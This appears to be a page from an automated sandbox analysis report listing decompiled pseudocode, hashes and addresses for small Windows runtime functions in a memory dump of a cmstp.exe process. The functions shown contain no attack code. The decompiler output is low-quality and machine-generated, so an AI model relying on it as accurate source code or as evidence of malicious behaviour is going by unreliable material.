Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: b757fc7591938bc45c5e8f5f1c3a9f99551ae5b96bbaeec2c5f657e3e6efb2a7
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: E5018132204680DBD7229759D809F6DBBDAFF51754F0A40A1FA168B6B1D7B9C800C725

Uniqueness

Uniqueness Score: -1.00%

Function 0516FE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0516FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x51cd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E050F7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0511B640(E05119AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0516fe96
0x0516fe9e
0x0516fea1
0x0516fead
0x0516feb3
0x0516feb9
0x0516fec3
0x0516fed5
0x0516fec5
0x0516fece
0x0516fece
0x0516fee0
0x0516fee1
0x0516fee3
0x0516fee8
0x0516fefb

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 964ab834650dc4514d529e994b1d7a5958403b5b9aaa8e8c8f3ae5c3809ee3c3
Instruction ID: 8aeed03373cb7c2dc44449a1eac86888b438af1a1b7040c4eb9a27501f72df25
Opcode Fuzzy Hash: 964ab834650dc4514d529e994b1d7a5958403b5b9aaa8e8c8f3ae5c3809ee3c3
Instruction Fuzzy Hash: 3E016271A04208AFCB14DFA8E546A6EBBF4FF08300F1441A9B915DB382DA35D902CB44

Uniqueness

Uniqueness Score: -1.00%

Function 051A8F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E051A8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x51cd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E050F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0511B640(E05119AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x051a8f6a
0x051a8f79
0x051a8f81
0x051a8f84
0x051a8f8b
0x051a8f91
0x051a8f94
0x051a8f9e
0x051a8fb0
0x051a8fa0
0x051a8fa9
0x051a8fa9
0x051a8fbb
0x051a8fbc
0x051a8fbe
0x051a8fc3
0x051a8fd6

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b10e9d533dbe9c9c2b01641f85d59f6a2d3a0a81c18fc884ca856f884df05d3
Instruction ID: c28306dc058803c4297bec96d87703c13ce961e56b7aafa119a183a114237fe1
Opcode Fuzzy Hash: 7b10e9d533dbe9c9c2b01641f85d59f6a2d3a0a81c18fc884ca856f884df05d3
Instruction Fuzzy Hash: 46014475A0420DAFDB04DFA8D549AAEBBF4FF18300F504069B905EB381DB38DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0519131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0519131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x51cd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E050F7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0511B640(E05119AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0519131b
0x0519132a
0x05191330
0x05191336
0x0519133e
0x05191341
0x05191344
0x0519134f
0x05191361
0x05191351
0x0519135a
0x0519135a
0x0519136c
0x0519136d
0x0519136f
0x05191374
0x05191387

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3287173179c2ee7bdf824651e0f736711299271c5df83e90ae964355c719953b
Instruction ID: 626630b817435585e70859d1875995fa40e55350052508869333b42586b96ab5
Opcode Fuzzy Hash: 3287173179c2ee7bdf824651e0f736711299271c5df83e90ae964355c719953b
Instruction Fuzzy Hash: 18013171E05248AFCB04DFA9D545AAEBBF4FF08700F404069BD45EB381E7349A40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05191608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E05191608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x51cd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E050F7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0511B640(E05119AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x05191608
0x05191617
0x0519161d
0x05191625
0x05191628
0x0519162b
0x05191636
0x05191648
0x05191638
0x05191641
0x05191641
0x05191653
0x05191654
0x05191656
0x0519165b
0x0519166e

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4daf63040d1271705ce8475b1faa2db841ec55aa6ecf1a016ad02b0c0bac22d6
Instruction ID: 640fd68a4d0f5e4b96f9f5c7e0ccc77c6fe3f561b35ce4db29e4210c7d76fd26
Opcode Fuzzy Hash: 4daf63040d1271705ce8475b1faa2db841ec55aa6ecf1a016ad02b0c0bac22d6
Instruction Fuzzy Hash: 38F06271E44258EFDB14DFA8D405EAEBBF4FF18700F4440A9B915EB381EA749900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 050FC577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050FC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E050FC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x50b11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E051A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x050fc577
0x050fc57d
0x050fc581
0x050fc5b5
0x050fc5b9
0x050fc5ce
0x050fc5ce
0x050fc5ca
0x00000000
0x050fc5ca
0x050fc5c4
0x050fc5c8
0x00000000
0x00000000
0x00000000
0x050fc5ad
0x00000000
0x050fc5af

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05032213954995585e784a6114fd8e414829c22d6b47c57757e131448d7c29dc
Instruction ID: 9722d55cc816170c6cfd84bfa843c8d01104185b4144d418a4e062b320b98068
Opcode Fuzzy Hash: 05032213954995585e784a6114fd8e414829c22d6b47c57757e131448d7c29dc
Instruction Fuzzy Hash: 8AF06DB291D6A89AF761C664A04DB697BE5BB85B60F444466D60687902C6A4DCC0C350

Uniqueness

Uniqueness Score: -1.00%

Function 051A8D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E051A8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x51cd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E050F7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0511B640(E05119AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x051a8d34
0x051a8d43
0x051a8d4b
0x051a8d4e
0x051a8d52
0x051a8d5c
0x051a8d6e
0x051a8d5e
0x051a8d67
0x051a8d67
0x051a8d79
0x051a8d7a
0x051a8d7c
0x051a8d81
0x051a8d94

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42432b838468ae6fc1a164f1124925e4c4d8c0b5135a3de58d61ccd88b5e3efc
Instruction ID: 02dcdc49698ad95a5ac3c8cb6a14f874e2fe50be513247d9984fe1cb0c14df17
Opcode Fuzzy Hash: 42432b838468ae6fc1a164f1124925e4c4d8c0b5135a3de58d61ccd88b5e3efc
Instruction Fuzzy Hash: F0F0B474A04648AFD714EFB8E445A6E77B4FF18300F5080A9F905EB281DB34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 05192073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05192073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0518FD22(__ecx);
				_t19 =  *0x51c849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x51c8748; // 0x0
					if(__eflags <= 0) {
						E05191C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x51c8724 & 0x00000004;
							if(( *0x51c8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x51c8724; // 0x0
					return E05188DF1(__ebx, 0xc0000374, 0x51c5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x05192076
0x05192078
0x0519207d
0x05192083
0x051920a4
0x051920aa
0x051920ac
0x051920b7
0x051920ba
0x051920bc
0x051920c9
0x051920c9
0x051920d0
0x051920d2
0x00000000
0x051920d2
0x051920be
0x051920c3
0x051920c5
0x051920c7
0x00000000
0x00000000
0x051920c7
0x051920bc
0x051920d4
0x05192085
0x05192085
0x051920a3
0x051920a3

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a1e938829dbef7c87fc781e4609681e1bf76e1519f688b65b7bed2c9c20181
Instruction ID: 63223570531c8f8fede48b1845b65503de106b365656dbd0bde80657f47cb0ee
Opcode Fuzzy Hash: c3a1e938829dbef7c87fc781e4609681e1bf76e1519f688b65b7bed2c9c20181
Instruction Fuzzy Hash: 03F0A76E5253D4AAEE3ABB2461467F62F95E745210B4E1485E46167241CB3688C3CE60

Uniqueness

Uniqueness Score: -1.00%

Function 0511927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0511927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0511FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E051192C6(_t11, _t14);
				}
				return _t11;
			}

0x05119295
0x05119299
0x0511929f
0x051192aa
0x051192ad
0x051192ae
0x051192af
0x051192b0
0x051192b4
0x051192bb
0x051192bb
0x051192c5

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 5a1ace28fa887490760bd30d071f2026739446817a757dd92c5a96fa4bd5f9b6
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: CAE092323406406BEB219E5ADC98F5777ADEFC2721F0440B9BD045E283CBEADD0987A4

Uniqueness

Uniqueness Score: -1.00%

Function 050F746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E050F746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E050EEB70(__ecx, 0x51c79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E051195D0();
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x050f746d
0x050f746d
0x050f746d
0x050f7471
0x050f7488
0x0513f92d
0x050f748e
0x050f7491
0x050f7495
0x0513f937
0x0513f93a
0x0513f94e
0x0513f953
0x0513f956
0x0513f956
0x050f7495
0x00000000
0x050f7488
0x050f7473
0x050f7478
0x050f747d
0x050f7481
0x00000000
0x050f7481
0x050f747d
0x050f747a
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a76b7fd361efd7031fdf6f1a5a92351100fade9bd0ac33052dc52392e3800d6
Instruction ID: 05f8c7ec76e3af460d6eff9b2bd5f05e125e44a842ec7bd767cdaeef445c5224
Opcode Fuzzy Hash: 0a76b7fd361efd7031fdf6f1a5a92351100fade9bd0ac33052dc52392e3800d6
Instruction Fuzzy Hash: 03F0B434A04144AACF59D768E940FBD7BA2FF04250F04025ADE51AB950F765A8028B97

Uniqueness

Uniqueness Score: -1.00%

Function 051A8CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E051A8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x51cd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E050F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0511B640(E05119AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x051a8ce5
0x051a8ced
0x051a8cf0
0x051a8cfb
0x051a8d0d
0x051a8cfd
0x051a8d06
0x051a8d06
0x051a8d18
0x051a8d19
0x051a8d1b
0x051a8d20
0x051a8d33

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8381095431076757ca019d1a468883476b9ec3b7a1f1e5829e066138feb133a4
Instruction ID: 7711ef373c39d0aaa5965181754911bf124ac5abbb9b618bd685272c35ad713c
Opcode Fuzzy Hash: 8381095431076757ca019d1a468883476b9ec3b7a1f1e5829e066138feb133a4
Instruction Fuzzy Hash: 49F08975A04648ABDB04DBA8E545D6E7BB4EF18200F5401A9F916EB2C1DB34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 050D4F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050D4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E051A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E050FC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x50b1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x050d4f2e
0x050d4f34
0x050d4f38
0x05130b85
0x05130b85
0x05130b89
0x05130b9a
0x05130b9a
0x05130b9f
0x00000000
0x05130b9f
0x05130b94
0x05130b98
0x00000000
0x00000000
0x00000000
0x05130b98
0x050d4f3e
0x050d4f48
0x00000000
0x050d4f6e
0x00000000
0x050d4f70

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47412614c8ff37f29a3cfa4e233afaaf90b92a6b1e25655eab32bff0d7cbe56f
Instruction ID: be7008521573bccb509b73fcd3c9b048d3857b404b13dfefba8b308477fdcc46
Opcode Fuzzy Hash: 47412614c8ff37f29a3cfa4e233afaaf90b92a6b1e25655eab32bff0d7cbe56f
Instruction Fuzzy Hash: 7FF0E23A9296C49FD771C718D1EDF26BBE5BF08778F044464D40687925C774ED80C640

Uniqueness

Uniqueness Score: -1.00%

Function 051A8B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E051A8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x51cd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E050F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0511B640(E05119AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x051a8b67
0x051a8b6f
0x051a8b72
0x051a8b7d
0x051a8b8f
0x051a8b7f
0x051a8b88
0x051a8b88
0x051a8b9a
0x051a8b9b
0x051a8b9d
0x051a8ba2
0x051a8bb5

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a30aad7f9c6e800bdebf735ac9c117aad13899bf99d59d27f2e208c3fbdf161
Instruction ID: 07d8369f6402e6318592bf07b7d40ad355a777b71c39d033f118a02cc2929f8e
Opcode Fuzzy Hash: 5a30aad7f9c6e800bdebf735ac9c117aad13899bf99d59d27f2e208c3fbdf161
Instruction Fuzzy Hash: 0AF082B1B14258AFDB14EBA8E94AE6E77B4FF04300F4404A9BA05DB3C1EB34D901C798

Uniqueness

Uniqueness Score: -1.00%

Function 0510A44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0510A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x51c7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0511FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0510a44b
0x0510a453
0x0510a472
0x0510a476
0x00000000
0x0510a493
0x0510a47a
0x0510a47f
0x0510a486
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deb76c3bcad229dec4c71e8a47dfbe273c524a9a966cda617c71cdc0e34d5552
Instruction ID: 46024ceff81d7214de3bcb13a0af5354a0e3b02023ea604efbba9da6b94861e8
Opcode Fuzzy Hash: deb76c3bcad229dec4c71e8a47dfbe273c524a9a966cda617c71cdc0e34d5552
Instruction Fuzzy Hash: 73E09272B41421ABD2219E18BC00F6777ADEFE4651F0A4039F905C7290DAA8DD02C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 05104710 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05104710(intOrPtr* _a4) {
				void* _t5;
				intOrPtr _t12;
				intOrPtr* _t14;

				_t5 = E050F7D50();
				if(_t5 != 0) {
					_t12 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x10));
					L3:
					 *_a4 = _t12;
					L4:
					return 1;
				}
				if( *0x7ffe0268 == _t5) {
					_t14 = _a4;
					if(E051864FB(_t14) >= 0) {
						goto L4;
					}
					 *_t14 = 1;
					return 0;
				}
				_t12 =  *0x7ffe0264;
				goto L3;
			}

0x05104716
0x0510471d
0x05146655
0x05104735
0x05104738
0x0510473a
0x00000000
0x0510473a
0x05104729
0x0514662d
0x05146639
0x00000000
0x00000000
0x05146641
0x00000000
0x05146641
0x0510472f
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0df256ba2b9307f516b5a4f7d47ef3065f2fd7a7a153fc2d55d4bb558cf3f2de
Instruction ID: 6d863cc66db6c29876af3e53b520e64d31e9ccdc18a654da2ecccfcd9bc72e9d
Opcode Fuzzy Hash: 0df256ba2b9307f516b5a4f7d47ef3065f2fd7a7a153fc2d55d4bb558cf3f2de
Instruction Fuzzy Hash: AFF065763047409FCB16EF15D080AB97BA6FB56350F055055ED428B391D7B1E941CB45

Uniqueness

Uniqueness Score: -1.00%

